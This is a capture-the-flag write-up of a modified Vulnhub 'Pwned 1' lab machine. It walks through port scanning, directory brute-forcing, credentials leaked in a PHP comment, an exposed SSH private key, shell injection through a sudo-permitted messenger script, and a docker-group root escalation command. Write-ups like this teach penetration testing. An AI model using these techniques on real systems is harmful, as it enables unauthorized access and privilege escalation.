Posts Pwned 1 CTF Writeup
Post
Cancel

Pwned 1 CTF Writeup

Dec 23, 2020 2020-12-23T16:11:00+07:00 by Hoang Nguyen
7 min

Machine Info

This machine is a modified version of Pwned 1 on Vulnhub. As this machine is modified, there will be some commands or filename that are different from the official one.

Goals

The goal is to get the user shell and the root shell.

User flag

First we find the machine’s IP using nmap:

1
2
3
4
5
6
7
8
9
10

$ nmap 10.0.2.1-255    
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 03:27 EST
...
Nmap scan report for 10.0.2.17
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

The machine has the IP of 10.0.2.17 and have 3 services open on 3 ports. We should probably get their version info as well.

1
2
3
4
5
6
7
8
9
10

$ nmap -sV 10.0.2.17   
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 03:30 EST
Nmap scan report for 10.0.2.17
Host is up (0.00063s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Access the HTTP service just to see there’s nothing interesting on the page. I will try enumerating the http directories now. I will use the directory-list-2.3-big.txt wordlist.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

$ gobuster dir -w directory-list-2.3-big.txt --url 10.0.2.17 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.0.2.17
[+] Threads:        10
[+] Wordlist:       pwned1wl.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/23 03:35:00 Starting gobuster
===============================================================
/nothing (Status: 301)
/robots.txt (Status: 200)
/hidden_text (Status: 301)
===============================================================
2020/12/23 03:35:00 Finished
===============================================================

The hidden_text path looks interesting. Let’s go there now.

hidden_text folder content

The content of secret.dic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

/hacked 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/kor 
/ccc
/cmgt
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

This looks like a directories listing that can be used in gobuster:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

$ gobuster dir -w pwned1wl.txt --url 10.0.2.17
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.0.2.17
[+] Threads:        10
[+] Wordlist:       pwned1wl.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/23 03:39:26 Starting gobuster
===============================================================
/pwned.vuln (Status: 301)
===============================================================
2020/12/23 03:39:26 Finished
===============================================================

One of them exists. When we go there and view the page source, we see this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<!DOCTYPE html>
<html>
<head> 
	<title>login</title>
</head>
<body>
....... (truncated)
</body>
</html>

<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
?>

That’s it, we found our first access point to the machine. There’s a user called ftpuser that has the password B0ss_B!TcH. We also know that the machine is running SSH:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

$ ssh ftpuser@10.0.2.17
ftpuser@10.0.2.17\'s password: 
ftpuser@labs2:~$ ls
share
ftpuser@labs2:~$ cd share
ftpuser@labs2:~/share$ ls
leuleu.txt  note.txt
ftpuser@labs2:~/share$ cat leuleu.txt 
=))))))))))))))))))))
l and l and l
It\'s just l
=))))))))))))))

Q01DX0xldUxldV9QYXNzX05l


-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

ftpuser@labs2:~/share$ cat note.txt 
Nothing here.

sorry cmc :(

In the home directory of ftpuser we found an OpenSSH private key that can probably be used to connect to an account on the machine, as well as a short text with the character l repeated multiple times. The text Q01DX0xldUxldV9QYXNzX05l is a Base64 string, we can decode into CMC_LeuLeu_Pass_Ne

We need to put the SSH key into a seperate file, I name this file ssh_key. Then we must restrict it’s permission to conform to the SSH standards using chmod 600 ssh_key.

But there is a problem, we do not know for whom this key works. A quick cat reveals us:

1
2
3
4
5
6
7
8

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
ftpuser:x:1002:1002::/home/ftpuser:/bin/bash
aishee:x:1003:1003:,,,:/home/aishee:/bin/bash
cmc:x:1000:1000:Ariana,,,:/home/cmc:/bin/bash
hoangmongto:x:1001:1001:,,,:/home/hoangmongto:/bin/bash
l:x:1004:1004:,,,:/home/l:/bin/bash

There are multiple candidates, but nothing we can’t handle, and it turns out that there IS a user named l.

The cmc user

After trying to connect a few times, we know that the SSH key from earlier is for the cmc user:

1

$ ssh cmc@10.0.2.17 -i /tmp/ssh_key

Here we can find one of the flags used in this CTF:

1
2
3
4
5
6
7
8
9
10

cmc@labs2:~$ ls
leuleu.cmc  user1.txt
cmc@labs2:~$ cat user1.txt 
congratulations you Pwned cmc 

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

1
2
3
4

cmc@labs2:~$ cat leuleu.cmc 
Doc khong ky thi toach nhe baby =)))))

Today Hoangmongto fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

The second text mentioned Hoangmongto, a user on the system. The second flag must be either here or in l’s home directory.

The hoangmongto user

Interestingly, running sudo -l tells us that the user cmc can run a program as hoangmongto:

1
2
3
4
5
6

cmc@labs2:~$ sudo -l
Matching Defaults entries for cmc on labs2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cmc may run the following commands on labs2:
    (hoangmongto) NOPASSWD: /home/messenger.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

cmc@labs2:~$ cat /home/messenger.sh 
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name 
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

The program in action:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

cmc@labs2:~$ sudo -u hoangmongto /home/messenger.sh 
Welcome to linux.messenger 


ftpuser:
aishee:
cmc:
hoangmongto:
l:

Enter username to send message : l

Enter message for l :hello

Sending message to l 

Message sent to l :)

Pay attention to line 17 of the script, do you notice anything peculiar? Yep, the line $msg 2> /dev/null does not actually send the text. It just execute what we typed in as a shell command. We can invoke a shell like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

Welcome to linux.messenger 


ftpuser:
aishee:
cmc:
hoangmongto:
l:

Enter username to send message : hoang

Enter message for hoang :bash -i
$ whoami
hoangmongto

And just like that, we spawned an interactive shell under the user hoangmongto. The flag is in the home directory.

Root flag

Now we need to think of a way to get the root shell. Fortunately, the user hoangmongto is in the docker group, so they can run docker on this machine.

1
2

$ id
uid=1001(hoangmongto) gid=1001(hoangmongto) groups=1001(hoangmongto),115(docker)

You can use docker to spawn a root shell, I won’t get into the details here, I recommend reading this article and the GTFOBins page.

1
2
3
4
5
6
7
8
9

$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash
root@2eb8091c676c:~# cat root.txt 
Flag_Tao_La_Hero_3



Pass easy vcl

Aishee Nguyen - CMC SOC
CTF Writeup, Vulnhub
vulnhub ctf english
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

Wgel CTF Writeup

Jarvis CTF Writeup